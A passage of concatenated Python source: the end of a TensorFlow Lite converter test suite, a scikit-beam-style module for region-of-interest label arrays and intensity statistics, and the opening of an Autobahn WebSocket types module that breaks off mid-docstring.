super(EmbeddingModel, self).__init__()
self.shared_weights = self.add_weight(
'weights',
shape=(2000, 300),
dtype=dtypes.float32,
initializer=init_ops.random_normal_initializer(
mean=0.0, stddev=300**(-0.5)))
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=(20), dtype=dtypes.int32)
])
def func(self, x):
return array_ops.gather(self.shared_weights, x)
# Building the model.
root = EmbeddingModel()
concrete_func = root.func.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = enable_mlir
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.func(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0], 5)
@test_util.run_v2_only
def testGraphDebugInfo(self):
"""Test a concrete function has debug info captured."""
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.f = def_function.function(lambda x: root.v1 * x)
input_data = constant_op.constant(1., shape=[1])
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.convert()
self._assertValidDebugInfo(converter._debug_info)
class FromSavedModelTest(TestModels):
@test_util.run_v2_only
def testConstModel(self):
"""Test a basic model with functions to make sure functions are inlined."""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.f = def_function.function(lambda x: 2. * x)
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testVariableModel(self):
"""Test a basic model with Variables with saving/loading the SavedModel."""
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[1])
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testSignatures(self):
"""Test values for `signature_keys` argument."""
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[1])
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save)
# Convert model with invalid `signature_keys`.
with self.assertRaises(ValueError) as error:
_ = lite.TFLiteConverterV2.from_saved_model(
save_dir, signature_keys=['INVALID'])
self.assertIn("Invalid signature key 'INVALID'", str(error.exception))
# Convert model with empty `signature_keys`.
converter = lite.TFLiteConverterV2.from_saved_model(
save_dir, signature_keys=[])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testMultipleFunctionModel(self):
"""Convert multiple functions in a multi-functional model."""
root = self._getMultiFunctionModel()
input_data = constant_op.constant(1., shape=[1])
add_func = root.add.get_concrete_function(input_data)
sub_func = root.sub.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, {'add': add_func, 'sub': sub_func})
# Ensure the converter generates.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
self.assertLen(converter._funcs, 2)
# Try converting multiple functions.
with self.assertRaises(ValueError) as error:
_ = converter.convert()
self.assertIn('This converter can only convert a single ConcreteFunction',
str(error.exception))
@test_util.run_v2_only
def testKerasSequentialModel(self):
"""Test a simple sequential tf.Keras model."""
input_data = constant_op.constant(1., shape=[1, 1])
x = np.array([[1.], [2.]])
y = np.array([[2.], [4.]])
model = keras.models.Sequential([
keras.layers.Dropout(0.2),
keras.layers.Dense(1),
])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit(x, y, epochs=1)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(model, save_dir)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = model.predict(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value, actual_value)
@test_util.run_v2_only
def testGraphDebugInfo(self):
"""Test a SavedModel has debug info captured."""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.f = def_function.function(lambda x: 2. * x)
to_save = root.f.get_concrete_function(input_data)
options = save_options.SaveOptions(save_debug_info=True)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save, options)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
converter.convert()
self._assertValidDebugInfo(converter._debug_info)
class FromKerasModelTest(TestModels):
@test_util.run_v2_only
def testSequentialModel(self):
"""Test a simple sequential tf.Keras model."""
input_data = constant_op.constant(1., shape=[1, 1])
# Create a simple Keras model.
x = np.array([[1.], [2.]])
y = np.array([[2.], [4.]])
model = keras.models.Sequential([
keras.layers.Dropout(0.2),
keras.layers.Dense(units=1, input_shape=[1])
])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit(x, y, epochs=1)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_keras_model(model)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = model.predict(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value, actual_value)
@test_util.run_v2_only
def testSequentialMultiInputOutputModel(self):
"""Test a tf.Keras model with multiple inputs and outputs."""
left_input_data = constant_op.constant(1., shape=[1, 3])
right_input_data = constant_op.constant(1., shape=[1, 3])
# Create a simple Keras model.
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_c_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 2))
input_a = keras.layers.Input(shape=(3,), name='input_a')
input_b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(8, name='dense_1')
interm_a = dense(input_a)
interm_b = dense(input_b)
merged = keras.layers.concatenate([interm_a, interm_b], name='merge')
output_c = keras.layers.Dense(
3, activation='softmax', name='dense_2')(
merged)
output_d = keras.layers.Dense(
2, activation='softmax', name='dense_3')(
merged)
model = keras.models.Model(
inputs=[input_a, input_b], outputs=[output_c, output_d])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit([input_a_np, input_b_np], [output_c_np, output_d_np], epochs=1)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_keras_model(model)
tflite_model = converter.convert()
# Check values from converted model.
input_data = [left_input_data, right_input_data]
expected_value = model.predict(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, input_data)
for tf_result, tflite_result in zip(expected_value, actual_value):
np.testing.assert_almost_equal(tf_result, tflite_result, 5)
@test_util.run_v2_only
def testGraphDebugInfo(self):
"""Test a tf.Keras model has debug info captured."""
# Create a simple Keras model.
x = [-1, 0, 1, 2, 3, 4]
y = [-3, -1, 1, 3, 5, 7]
model = keras.models.Sequential(
[keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit(x, y, epochs=1)
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.convert()
self._assertValidDebugInfo(converter._debug_info)
class ControlFlowTest(TestModels):
@test_util.run_v2_only
def testCond(self):
input_data = {
'x': constant_op.constant([1., 2.], shape=[1, 2]),
'b': constant_op.constant(True)
}
weights = variables.Variable([[0.1, 0.2], [0.3, 0.4]], dtype=dtypes.float32)
def true_fn(x):
return math_ops.matmul(x, weights)
def false_fn(x):
return math_ops.add(x, weights)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[1, 2], dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=(), dtype=dtypes.bool)
])
def model(x, b):
return control_flow_ops.cond(
b, true_fn=lambda: true_fn(x), false_fn=lambda: false_fn(x))
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(**input_data)
actual_value = self._evaluateTFLiteModel(
tflite_model, [input_data['x'], input_data['b']])[0]
np.testing.assert_almost_equal(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testStaticRnn(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((3, 10)), dtype=np.float32))
cell = rnn_cell_impl.LSTMCell(10)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[3, 10], dtype=dtypes.float32)
])
def model(x):
seq = array_ops.split(x, 3, 0)
return rnn.static_rnn(
cell, seq, dtype=dtypes.float32, sequence_length=[1])
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)[0]
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
for expected, actual in zip(expected_value, actual_value):
np.testing.assert_almost_equal(expected.numpy(), actual)
@test_util.run_v2_only
def testWhileLoop(self):
input_data = constant_op.constant([1., 2., 3., 4.], shape=[2, 2])
weights = variables.Variable([[0.1, 0.2], [0.3, 0.4]], dtype=dtypes.float32)
def condition(x):
return math_ops.reduce_sum(x) < 100
def body(x):
return math_ops.add(x, weights)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[2, 2], dtype=dtypes.float32)
])
def model(x):
return control_flow_ops.while_loop(condition, body, [x])
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
np.testing.assert_almost_equal(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testDynamicRnn(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((3, 10, 10)), dtype=np.float32))
cell = rnn_cell_impl.LSTMCell(10)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[3, 10, 10], dtype=dtypes.float32)
])
def model(x):
return rnn.dynamic_rnn(cell, x, dtype=dtypes.float32)
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
for expected, actual in zip(expected_value, actual_value):
if isinstance(expected, ops.EagerTensor):
expected = expected.numpy()
else:
expected = expected.c.numpy()
np.testing.assert_almost_equal(expected, actual)
@parameterized.named_parameters(('LSTM', recurrent_v2.LSTM),
('SimpleRNN', recurrent.SimpleRNN),
('GRU', recurrent_v2.GRU))
@test_util.run_v2_only
def testKerasRNN(self, rnn_layer):
# This relies on TFLiteConverter to rewrite unknown batch size to 1. The
# model will fail if resizing the input to non-1 batch size.
input_data = constant_op.constant(
np.array(np.random.random_sample((1, 10, 10)), dtype=np.float32))
rnn_obj = rnn_layer(units=10, input_shape=(10, 10))
model = keras.models.Sequential([rnn_obj])
# Convert model.
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.experimental_new_converter = True
tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
# Check values from converted model.
expected_value = model.predict(input_data)
np.testing.assert_almost_equal(expected_value, actual_value, decimal=5)
@parameterized.named_parameters(('LSTM', recurrent_v2.LSTM),
('SimpleRNN', recurrent.SimpleRNN),
('GRU', recurrent_v2.GRU))
@test_util.run_v2_only
def testKerasRNNMultiBatches(self, rnn_layer):
input_data = constant_op.constant(
np.array(np.random.random_sample((4, 10, 10)), dtype=np.float32))
# Specify a fixed batch size(4) for the test model.
x = keras.layers.Input(batch_shape=(4, 10, 10))
y = rnn_layer(units=10, input_shape=(10, 10))(x)
model = keras.Model(inputs=[x], outputs=[y])
# Convert model.
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.experimental_new_converter = True
tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
# Check values from converted model.
expected_value = model.predict(input_data)
np.testing.assert_almost_equal(expected_value, actual_value, decimal=5)
@test_util.run_v2_only
def testKerasBidirectionalRNN(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((1, 10, 10)), dtype=np.float32))
model = keras.models.Sequential()
model.add(
keras.layers.Bidirectional(
recurrent_v2.LSTM(units=10, return_sequences=True),
input_shape=(10, 10)))
model.add(keras.layers.Bidirectional(recurrent_v2.LSTM(units=10)))
model.add(keras.layers.Dense(5))
model.add(keras.layers.Activation('softmax'))
# Convert model.
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.experimental_new_converter = True
tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
# Check values from converted model.
expected_value = model.predict(input_data)
np.testing.assert_almost_equal(expected_value, actual_value, decimal=5)
class GrapplerTest(TestModels):
@test_util.run_v2_only
def testConstantFolding(self):
# Constant folding handles the tf.broadcast_to operation which was not
# supported by the TFLite at the time this test was added.
input_data = constant_op.constant([1., 2., 3., 4., 5., 6., 7., 8., 9.],
shape=[3, 3])
@def_function.function
def func(x):
y_const = constant_op.constant([1., 2., 3.])
y_broadcast = gen_array_ops.broadcast_to(y_const, [3, 3])
return math_ops.matmul(x, y_broadcast)
root = tracking.AutoTrackable()
root.f = func
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0])
# Enable hybrid quantization, same result
converter.experimental_new_converter = True
converter.optimizations = [lite.Optimize.DEFAULT]
hybrid_tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(hybrid_tflite_model, [input_data])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0])
class UnknownShapes(TestModels):
@test_util.run_v2_only
def testMatMul(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((10, 4)), dtype=np.float32))
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[None, 4], dtype=dtypes.float32)
])
def model(in_tensor):
shape = array_ops.shape_v2(in_tensor)
fill = array_ops.transpose_v2(array_ops.fill(shape, 1.))
return math_ops.matmul(fill, in_tensor)
concrete_func = model.get_concrete_function()
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)
actual_value = self._evaluateTFLiteModel(
tflite_model, [input_data], input_shapes=[([-1, 4], [10, 4])])
np.testing.assert_almost_equal(
expected_value.numpy(), actual_value[0], decimal=6)
def testBatchMatMul(self):
self.skipTest('BatchMatMulV2 does not support unknown batch size.')
input_data_1 = constant_op.constant(
np.array(np.random.random_sample((1, 256, 256)), dtype=np.float32))
input_data_2 = constant_op.constant(
np.array(np.random.random_sample((1, 256, 256)), dtype=np.float32))
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[None, 256, 256], dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=[None, 256, 256], dtype=dtypes.float32)
])
def model(in_tensor_1, in_tensor_2):
return math_ops.matmul(in_tensor_1, in_tensor_2)
concrete_func = model.get_concrete_function()
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data_1, input_data_2)
actual_value = self._evaluateTFLiteModel(
tflite_model, [input_data_1, input_data_2],
input_shapes=[([-1, 256, 256], [1, 256, 256])])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0])
if __name__ == '__main__':
test.main()
|
|
#! encoding: utf-8
# ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
"""
This module contain convenience methods to generate ROI labeled arrays for
simple shapes such as rectangles and concentric circles.
"""
from __future__ import absolute_import, division, print_function
import collections
import logging
import scipy.ndimage.measurements as ndim
import numpy as np
from . import utils
logger = logging.getLogger(__name__)
def rectangles(coords, shape):
"""
This function wil provide the indices array for rectangle region of
interests.
Parameters
----------
coords : iterable
coordinates of the upper-left corner and width and height of each
rectangle: e.g., [(x, y, w, h), (x, y, w, h)]
shape : tuple
Image shape which is used to determine the maximum extent of output
pixel coordinates. Order is (rr, cc).
Returns
-------
label_array : array
Elements not inside any ROI are zero; elements inside each
ROI are 1, 2, 3, corresponding to the order they are specified
in coords. Order is (rr, cc).
"""
labels_grid = np.zeros(shape, dtype=np.int64)
for i, (col_coor, row_coor, col_val, row_val) in enumerate(coords):
left, right = np.max([col_coor, 0]), np.min([col_coor + col_val,
shape[0]])
top, bottom = np.max([row_coor, 0]), np.min([row_coor + row_val,
shape[1]])
slc1 = slice(left, right)
slc2 = slice(top, bottom)
if np.any(labels_grid[slc1, slc2]):
raise ValueError("overlapping ROIs")
# assign a different scalar for each roi
labels_grid[slc1, slc2] = (i + 1)
return labels_grid
def rings(edges, center, shape):
"""
Draw annual (ring-shaped) regions of interest.
Each ring will be labeled with an integer. Regions outside any ring will
be filled with zeros.
Parameters
----------
edges: list
giving the inner and outer radius of each ring
e.g., [(1, 2), (11, 12), (21, 22)]
center : tuple
point in image where r=0; may be a float giving subpixel precision.
Order is (rr, cc).
shape: tuple
Image shape which is used to determine the maximum extent of output
pixel coordinates. Order is (rr, cc).
Returns
-------
label_array : array
Elements not inside any ROI are zero; elements inside each
ROI are 1, 2, 3, corresponding to the order they are specified
in edges.
"""
edges = np.atleast_2d(np.asarray(edges)).ravel()
if not 0 == len(edges) % 2:
raise ValueError("edges should have an even number of elements, "
"giving inner, outer radii for each ring")
if not np.all(np.diff(edges) >= 0):
raise ValueError("edges are expected to be monotonically increasing, "
"giving inner and outer radii of each ring from "
"r=0 outward")
r_coord = utils.radial_grid(center, shape).ravel()
label_array = np.digitize(r_coord, edges, right=False)
# Even elements of label_array are in the space between rings.
label_array = (np.where(label_array % 2 != 0, label_array, 0) + 1) // 2
return label_array.reshape(shape)
def ring_edges(inner_radius, width, spacing=0, num_rings=None):
"""
Calculate the inner and outer radius of a set of rings.
The number of rings, their widths, and any spacing between rings can be
specified. They can be uniform or varied.
Parameters
----------
inner_radius : float
inner radius of the inner-most ring
width : float or list of floats
ring thickness
If a float, all rings will have the same thickness.
spacing : float or list of floats, optional
margin between rings, 0 by default
If a float, all rings will have the same spacing. If a list,
the length of the list must be one less than the number of
rings.
num_rings : int, optional
number of rings
Required if width and spacing are not lists and number
cannot thereby be inferred. If it is given and can also be
inferred, input is checked for consistency.
Returns
-------
edges : array
inner and outer radius for each ring
Example
-------
# Make two rings starting at r=1px, each 5px wide
>>> ring_edges(inner_radius=1, width=5, num_rings=2)
[(1, 6), (6, 11)]
# Make three rings of different widths and spacings.
# Since the width and spacings are given individually, the number of
# rings here is simply inferred.
>>> ring_edges(inner_radius=1, width=(5, 4, 3), spacing=(1, 2))
[(1, 6), (7, 11), (13, 16)]
"""
# All of this input validation merely checks that width, spacing, and
# num_rings are self-consistent and complete.
width_is_list = isinstance(width, collections.Iterable)
spacing_is_list = isinstance(spacing, collections.Iterable)
if (width_is_list and spacing_is_list):
if len(width) != len(spacing) - 1:
raise ValueError("List of spacings must be one less than list "
"of widths.")
if num_rings is None:
try:
num_rings = len(width)
except TypeError:
try:
num_rings = len(spacing) + 1
except TypeError:
raise ValueError("Since width and spacing are constant, "
"num_rings cannot be inferred and must be "
"specified.")
else:
if width_is_list:
if num_rings != len(width):
raise ValueError("num_rings does not match width list")
if spacing_is_list:
if num_rings-1 != len(spacing):
raise ValueError("num_rings does not match spacing list")
# Now regularlize the input.
if not width_is_list:
width = np.ones(num_rings) * width
if not spacing_is_list:
spacing = np.ones(num_rings - 1) * spacing
# The inner radius is the first "spacing."
all_spacings = np.insert(spacing, 0, inner_radius)
steps = np.array([all_spacings, width]).T.ravel()
edges = np.cumsum(steps).reshape(-1, 2)
return edges
def segmented_rings(edges, segments, center, shape, offset_angle=0):
"""
Parameters
----------
edges : array
inner and outer radius for each ring
segments : int or list
number of pie slices or list of angles in radians
That is, 8 produces eight equal-sized angular segments,
whereas a list can be used to produce segments of unequal size.
center : tuple
point in image where r=0; may be a float giving subpixel precision.
Order is (rr, cc).
shape: tuple
Image shape which is used to determine the maximum extent of output
pixel coordinates. Order is (rr, cc).
angle_offset : float or array, optional
offset in radians from offset_angle=0 along the positive X axis
Returns
-------
label_array : array
Elements not inside any ROI are zero; elements inside each
ROI are 1, 2, 3, corresponding to the order they are specified
in edges and segments
"""
edges = np.asarray(edges).ravel()
if not 0 == len(edges) % 2:
raise ValueError("edges should have an even number of elements, "
"giving inner, outer radii for each ring")
if not np.all(np.diff(edges) >= 0):
raise ValueError("edges are expected to be monotonically increasing, "
"giving inner and outer radii of each ring from "
"r=0 outward")
agrid = utils.angle_grid(center, shape)
agrid[agrid < 0] = 2*np.pi + agrid[agrid < 0]
segments_is_list = isinstance(segments, collections.Iterable)
if segments_is_list:
segments = np.asarray(segments) + offset_angle
else:
# N equal segments requires N+1 bin edges spanning 0 to 2pi.
segments = np.linspace(0, 2*np.pi, num=1+segments, endpoint=True)
segments += offset_angle
# the indices of the bins(angles) to which each value in input
# array(angle_grid) belongs.
ind_grid = (np.digitize(np.ravel(agrid), segments,
right=False)).reshape(shape)
label_array = np.zeros(shape, dtype=np.int64)
# radius grid for the image_shape
rgrid = utils.radial_grid(center, shape)
# assign indices value according to angles then rings
len_segments = len(segments)
for i in range(len(edges) // 2):
indices = (edges[2*i] <= rgrid) & (rgrid < edges[2*i + 1])
# Combine "segment #" and "ring #" to get unique label for each.
label_array[indices] = ind_grid[indices] + (len_segments - 1) * i
return label_array
def roi_max_counts(images_sets, label_array):
"""
Return the brightest pixel in any ROI in any image in the image set.
Parameters
----------
images_sets : array
iterable of 4D arrays
shapes is: (len(images_sets), )
label_array : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
Returns
-------
max_counts : int
maximum pixel counts
"""
max_cts = 0
for img_set in images_sets:
for img in img_set:
max_cts = max(max_cts, ndim.maximum(img, label_array))
return max_cts
def roi_pixel_values(image, labels, index=None):
"""
This will provide intensities of the ROI's of the labeled array
according to the pixel list
eg: intensities of the rings of the labeled array
Parameters
----------
image : array
image data dimensions are: (rr, cc)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
index_list : list, optional
labels list
eg: 5 ROI's
index = [1, 2, 3, 4, 5]
Returns
-------
roi_pix : list
intensities of the ROI's of the labeled array according
to the pixel list
"""
if labels.shape != image.shape:
raise ValueError("Shape of the image data should be equal to"
" shape of the labeled array")
if index is None:
index = np.arange(1, np.max(labels) + 1)
roi_pix = []
for n in index:
roi_pix.append(image[labels == n])
return roi_pix, index
def mean_intensity_sets(images_set, labels):
"""
Mean intensities for ROIS' of the labeled array for different image sets
Parameters
----------
images_set : array
images sets
shapes is: (len(images_sets), )
one images_set is iterable of 2D arrays dimensions are: (rr, cc)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
Returns
-------
mean_intensity_list : list
average intensity of each ROI as a list
shape len(images_sets)
index_list : list
labels list for each image set
"""
return tuple(map(list,
zip(*[mean_intensity(im,
labels) for im in images_set])))
def mean_intensity(images, labels, index=None):
"""
Mean intensities for ROIS' of the labeled array for set of images
Parameters
----------
images : array
Intensity array of the images
dimensions are: (num_img, num_rows, num_cols)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
index : list
labels list
eg: 5 ROI's
index = [1, 2, 3, 4, 5]
Returns
-------
mean_intensity : array
mean intensity of each ROI for the set of images as an array
shape (len(images), number of labels)
"""
if labels.shape != images[0].shape[0:]:
raise ValueError("Shape of the images should be equal to"
" shape of the label array")
if index is None:
index = np.arange(1, np.max(labels) + 1)
mean_intensity = np.zeros((images.shape[0], index.shape[0]))
for n, img in enumerate(images):
mean_intensity[n] = ndim.mean(img, labels, index=index)
return mean_intensity, index
def combine_mean_intensity(mean_int_list, index_list):
"""
Combine mean intensities of the images(all images sets) for each ROI
if the labels list of all the images are same
Parameters
----------
mean_int_list : list
mean intensity of each ROI as a list
shapes is: (len(images_sets), )
index_list : list
labels list for each image sets
img_set_names : list
Returns
-------
combine_mean_int : array
combine mean intensities of image sets for each ROI of labeled array
shape (number of images in all image sets, number of labels)
"""
if np.all(map(lambda x: x == index_list[0], index_list)):
combine_mean_intensity = np.vstack(mean_int_list)
else:
raise ValueError("Labels list for the image sets are different")
return combine_mean_intensity
def circular_average(image, calibrated_center, threshold=0, nx=100,
pixel_size=None):
"""
Circular average(radial integration) of the intensity distribution of
the image data.
Parameters
----------
image : array
input image
calibrated_center : tuple
The center in pixels-units (row, col)
threshold : int, optional
threshold value to mask
nx : int, optional
number of bins
pixel_size : tuple, optional
The size of a pixel in real units. (height, width). (mm)
Returns
-------
bin_centers : array
bin centers from bin edges
shape [nx]
ring_averages : array
circular integration of intensity
"""
radial_val = utils.radial_grid(calibrated_center, image.shape,
pixel_size)
bin_edges, sums, counts = utils.bin_1D(np.ravel(radial_val),
np.ravel(image), nx)
th_mask = counts > threshold
ring_averages = sums[th_mask] / counts[th_mask]
bin_centers = utils.bin_edges_to_centers(bin_edges)[th_mask]
return bin_centers, ring_averages
def roi_kymograph(images, labels, num):
"""
This function will provide data for graphical representation of pixels
variation over time for required ROI.
Parameters
----------
images : array
Intensity array of the images
dimensions are: (num_img, num_rows, num_cols)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
num : int
required ROI label
Returns
-------
roi_kymograph : array
data for graphical representation of pixels variation over time
for required ROI
"""
roi_kymo = []
for n, img in enumerate(images):
roi_kymo.append((roi_pixel_values(img,
labels == num)[0])[0])
return np.matrix(roi_kymo)
|
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import json
import six
__all__ = (
'ConnectionRequest',
'ConnectionResponse',
'ConnectionAccept',
'ConnectionDeny',
'Message',
'IncomingMessage',
'OutgoingMessage',
)
class ConnectionRequest(object):
"""
Thin-wrapper for WebSocket connection request information provided in
:meth:`autobahn.websocket.protocol.WebSocketServerProtocol.onConnect` when
a WebSocket client want to establish a connection to a WebSocket server.
"""
__slots__ = (
'peer',
'headers',
'host',
'path',
'params',
'version',
'origin',
'protocols',
'extensions'
)
def __init__(self, peer, headers, host, path, params, version, origin, protocols, extensions):
"""
:param peer: Descriptor of the connecting client (e.g. IP address/port in case of TCP transports).
:type peer: str
